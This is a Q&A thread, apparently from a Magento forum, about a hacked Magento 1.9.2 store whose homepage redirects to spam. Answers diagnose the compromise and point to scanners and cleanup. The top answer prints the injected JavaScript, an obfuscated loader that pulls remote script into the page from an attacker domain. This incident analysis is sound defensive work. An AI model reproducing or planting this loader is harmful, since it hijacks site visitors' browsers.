# Malware Attack On Magento 1.9.2

Tags: magento-1.9, security, redirect-url

My website [www.antiqworld.com](https://www.antiqworld.com/) whenever i am trying to open my website automatically redirect on (https://20.unverf.com/?h=230916016_ee5d07ec7ec_98_*_def_sub_*_sub_id_2&cnv=1) this url

please help to resolve this issue asap

Comment: it is only happen on homepage . go to  admin panel and check home page content for suspicious js script.

Answer (score 5):

It seems somebody hacked your site and inserted rogue code in the top 2 lines of `https://www.antiqworld.com/js/jquery/jquery-1.11.1.min.js`:

```
var po = document.createElement("script");
po.type = "text/javascript";
po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 106, 108, 99);
var scripts = document.getElementsByTagName("script");
var need_t = true;
var i = scripts.length;
for (; i--;) {
  if (scripts[i].src == po.src) {
    need_t = false;
  } else {
  }
}
if (need_t == true) {
  document.head.appendChild(po);
};
```

This results in a call to `cdn.allyouwant.online`, which in turn redirects to several spam URLs:

[image]

FYI I have just added this spam domain to the [Magento Malware Scanner](https://github.com/gwillem/magento-malware-scanner)

Advice: as somebody gained write access to your Magento install, you should conduct a proper investigation and/or issue a reinstall from the latest release. See for more tips: https://support.hypernode.com/knowledgebase/recover-a-hacked-magento-shop/

Comment: Ah, it was likely a Wordpress hack: https://blog.sucuri.net/2018/08/massive-wordpress-redirect-campaign-targets-vulnerable-tagdiv-themes-and-ultimate-member-plugins.html

Answer (score 1):

You can test your site for Malware attack here: https://sitecheck.sucuri.net/

Also you will get link of infected file,so you can correct it by yourself.

Below files are infected by javascript code:

```
1) https://www.antiqworld.com/js/jquery/jquery-1.11.1.min.js 
2) https://www.antiqworld.com/js/jquery/jquery-migrate-1.2.1.min.js
3) https://www.antiqworld.com/js/jquery/jquery_noconflict.js
4) https://www.antiqworld.com/skin/frontend/default/theme692/js/jquery.easing.1.3.js
```

So remove the script from top of all files mentioned above.

Hope it will help you.

Comment: I tried scanning my website with sucuri, it gives me that my website is infected with malware, but it does not give the file name just the URL. Could you plz tell me how I can get the file name too?